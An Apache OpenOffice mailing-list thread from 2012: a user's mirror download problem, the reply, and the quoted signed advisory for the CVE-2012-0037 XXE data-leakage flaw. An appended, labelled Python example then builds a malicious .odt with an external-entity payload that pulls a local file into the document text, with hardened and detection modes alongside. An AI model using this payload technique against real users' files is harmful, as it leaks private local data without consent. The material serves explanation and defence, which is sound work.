From: Rob Weir
To: ooo-users@incubator.apache.org
Cc: Henri
Date: Sat, 31 Mar 2012 15:33:23 -0400
Subject: Re: ADDITIONAL INFO, Re: CVE-2012-0037: OpenOffice.org data leakage vulnerability

On Sat, Mar 31, 2012 at 3:03 PM, Henri wrote:
>
> --- On Sat, 3/31/12, Henri wrote:
>
> From: Henri
> Subject: Re: CVE-2012-0037: OpenOffice.org data leakage vulnerability
> To: ooo-announce@incubator.apache.org
> Date: Saturday, March 31, 2012, 11:50 AM
>
> Trying to access patch to download from main site
> http://mirror.atlanticmetro.net/apache/incubator/ooo/3.3/patches/cve-2012-0037/CVE-2012-0037-win.zip
> results in this reply:
>
> Forbidden
> You don't have permission to access
> /apache/incubator/ooo/3.3/patches/cve-2012-0037/CVE-2012-0037-win.zip on this server.
> Apache/2.2.3 (CentOS) Server at mirror.atlanticmetro.net Port 80
>
> Please advise. Thanks
>

The main download link for the patch on Windows is this:

http://www.apache.org/dyn/closer.cgi/incubator/ooo/3.3/patches/cve-2012-0037/CVE-2012-0037-win.zip

When you click that link, we try to find a mirror server closest to you. This helps us balance the load and helps you find a server that is local, and therefore likely faster. Sometimes this fails and the closest mirror server is missing this file, or is down, or otherwise not functioning properly. When that happens, simply try another mirror from the long list presented to you.

Regards,

-Rob

>
> Henri
>
>
> --- On Thu, 3/22/12, Rob Weir wrote:
>
> From: Rob Weir
> Subject: CVE-2012-0037: OpenOffice.org data leakage vulnerability
> To: ooo-users@incubator.apache.org
> Date: Thursday, March 22, 2012, 6:16 AM
>
> Please note, this is the official security bulletin, targeted for security professionals. If you are an OpenOffice.org 3.3 user, and are able to apply the mentioned patch, then you are encouraged to do so. If someone else supports or manages your desktop, then please forward this information to them.
>
> Additional support is available on our Community Forums:
>
> http://user.services.openoffice.org/
>
> And via our ooo-users mailing list:
>
> http://incubator.apache.org/openofficeorg/mailing-lists.html#users-mailing-list
>
> Note: This security patch for OpenOffice.org is made available to legacy OpenOffice.org users as a service by the Apache OpenOffice Project Management Committee. The patch is made available under the Apache License, and due to its importance, we are releasing it outside of the standard release cycle.
>
> -Rob
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> CVE-2012-0037: OpenOffice.org data leakage vulnerability
>
> Severity: Important
>
> Vendor: The Apache Software Foundation
>
> Versions Affected: OpenOffice.org 3.3 and 3.4 Beta, on all platforms. Earlier versions may also be affected.
>
> Description: An XML External Entity (XXE) attack is possible in the above versions of OpenOffice.org. This vulnerability exploits the way in which external entities are processed in certain XML components of ODF documents. By crafting an external entity to refer to other local file system resources, an attacker would be able to inject contents of other locally-accessible files into the ODF document, without the user's knowledge or permission. Data leakage then becomes possible when that document is later distributed to other parties.
>
> Mitigation: OpenOffice.org 3.3.0 and 3.4 beta users should install the patch at: http://www.openoffice.org/security/cves/CVE-2012-0037.html
>
> This vulnerability is also fixed in Apache OpenOffice 3.4 dev snapshots since March 1st, 2012.
>
> Source and Building: Information on obtaining the source code for this patch, and for porting it or adapting it to OpenOffice.org derivatives can be found here:
> http://www.openoffice.org/security/cves/CVE-2012-0037-src.txt
>
> Credit: The Apache OpenOffice project acknowledges and thanks the discoverer of this issue, Timothy D. Morgan of Virtual Security Research, LLC.
>
> References: http://security.openoffice.org
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.11 (GNU/Linux)
>
> iQIcBAEBCgAGBQJPayGmAAoJEGFAoYdHzLzHJVcP/jXzY+ROwPTAaSItCc4GAn2q
> Gm3uL9D9aRrs/pp+sofRkF9L3nyWEyyVfvZv6+IBrqOU/2Tu1CD8cY6Kns1ZYxVO
> ZRDiR5hhr3pA6KfWlb9W9it/8JsTF7WZfTX0uRMPXCYlJuYQ38Nl7kloPYswXG2w
> By2J19VanlHuwLQJoNV08652HBDy2Xpa6Wk7N5NoyETILOS47QTgizjAYZ2AY0GE
> ykBFu9A9yblLM5zftuMT/4FxkHQ8Qx5I3NmV3V8cUgJlmbc2oscsC23iIPcoulJF
> GSn8tub/e47xzgpJy69NoHgzmb6Ou+J3BDXr0kmH008P6FaTpTgPTltZ8Fcua+T2
> JSWjzW5IBOW/20J9RN+5lkDJQTY5FiqqpjV7H6bZV3+MVx3Fk/ih1uJPr2cVZqaT
> pDU5xtn79py7MNsmpjnzD7mPbdiA2OfStzFpqUM60HOki7RgGpozvUPEvA0uIss9
> X/jP1KixPDdbGS2fMrM7KG9mnT8BOzwow0Vti7alP2x2BkTXZm2K/qflXJDFCxTn
> g23OJIxlnhC8cK4etyezWNMSya4LLMgz6ZO+TEdvCSaaF6b3t6seskgnFAMcdPHY
> bkfzzYnACtrvQAmRQ1Nn4i1yFGAY+cTE7sUO2NcFhHn6jXaiZFEatdh4XJEEcTXl
> OZE/3v6XnehMD/32kipa
> =/qce
> -----END PGP SIGNATURE-----
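The data-leakage mechanism the quoted advisory describes, shown as an added example that is not part of this thread and not OpenOffice's code. It models the class of bug in Python: a hypothetical ODF importer built on `xml.sax` opens `content.xml` from an `.odt` package, and whether it resolves external general entities (the `feature_external_ges` switch) decides whether a planted `<!ENTITY leak SYSTEM "...">` drags a local file into the paragraph text. The package builder, the importer, the `find_entity_declarations` triage check, the file names and the "secret" contents are all constructed for the demonstration; none of them correspond to OpenOffice's own parser code path.

```python
"""XXE in an ODF package, modelled in Python (added example, not OpenOffice code).

An ODF document is a zip whose content.xml is parsed on open. If the XML
parser resolves external general entities, a DOCTYPE planted in content.xml
can pull a local file into the document text, which is the leakage the
advisory describes. File names and contents below are constructed.
"""
import io
import os
import re
import tempfile
import zipfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

ODF_TEXT_MIMETYPE = "application/vnd.oasis.opendocument.text"


def build_malicious_odt(odt_path, target_path):
    """Write a minimal .odt whose content.xml declares an external entity
    pointing at target_path and references it inside a paragraph."""
    content_xml = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE office:document-content [\n'
        f'  <!ENTITY leak SYSTEM "{target_path}">\n'
        ']>\n'
        '<office:document-content'
        ' xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"'
        ' xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0">\n'
        '  <office:body><office:text>\n'
        '    <text:p>Quarterly report &leak;</text:p>\n'
        '  </office:text></office:body>\n'
        '</office:document-content>\n'
    )
    with zipfile.ZipFile(odt_path, "w") as z:
        # ODF packages carry "mimetype" first and uncompressed.
        z.writestr("mimetype", ODF_TEXT_MIMETYPE, compress_type=zipfile.ZIP_STORED)
        z.writestr("content.xml", content_xml, compress_type=zipfile.ZIP_DEFLATED)


class ParagraphCollector(ContentHandler):
    """Collects the character data of every text:p element."""

    def __init__(self):
        super().__init__()
        self.paragraphs = []
        self._buf = None

    def startElement(self, name, attrs):
        if name == "text:p":
            self._buf = []

    def characters(self, data):
        if self._buf is not None:
            self._buf.append(data)  # expat may deliver text in pieces

    def endElement(self, name):
        if name == "text:p" and self._buf is not None:
            self.paragraphs.append("".join(self._buf))
            self._buf = None


def import_paragraphs(odt_path, resolve_external_entities=False):
    """Hypothetical ODF importer. With resolve_external_entities=True the
    parser fetches SYSTEM entities (the unpatched behaviour the advisory
    describes); with False the reference expands to nothing."""
    with zipfile.ZipFile(odt_path) as z:
        content = z.read("content.xml")
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = ParagraphCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(content))
    return handler.paragraphs


DECL_RE = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b")


def find_entity_declarations(odt_path):
    """Triage check: list XML parts of an ODF package that carry a DOCTYPE or
    ENTITY declaration. Assumption behind the check: ordinary ODF exporters
    write neither, so any hit deserves a look before the file is opened."""
    with zipfile.ZipFile(odt_path) as z:
        return sorted(
            name for name in z.namelist()
            if name.endswith(".xml") and DECL_RE.search(z.read(name))
        )


def demo():
    """Build the victim file and the booby-trapped .odt, run both importer modes."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w", encoding="utf-8") as f:
            f.write("db_password=hunter2")  # constructed victim data
        odt_path = os.path.join(tmp, "report.odt")
        build_malicious_odt(odt_path, secret_path)
        return {
            "vulnerable": import_paragraphs(odt_path, resolve_external_entities=True),
            "hardened": import_paragraphs(odt_path, resolve_external_entities=False),
            "flagged": find_entity_declarations(odt_path),
        }


if __name__ == "__main__":
    for mode, value in demo().items():
        print(f"{mode}: {value}")
```

In the vulnerable mode the paragraph comes back as "Quarterly report db_password=hunter2", which is exactly what would be saved into the document and shipped to the next recipient; in the hardened mode the entity reference contributes nothing and the paragraph ends at "Quarterly report ". Python's `xml.sax` has defaulted `feature_external_ges` to off since 3.7.1, and the corresponding fix in any importer is the same knob in whatever XML library it uses; the declaration scan is a cheap pre-open triage step for documents from untrusted sources, not a substitute for that fix.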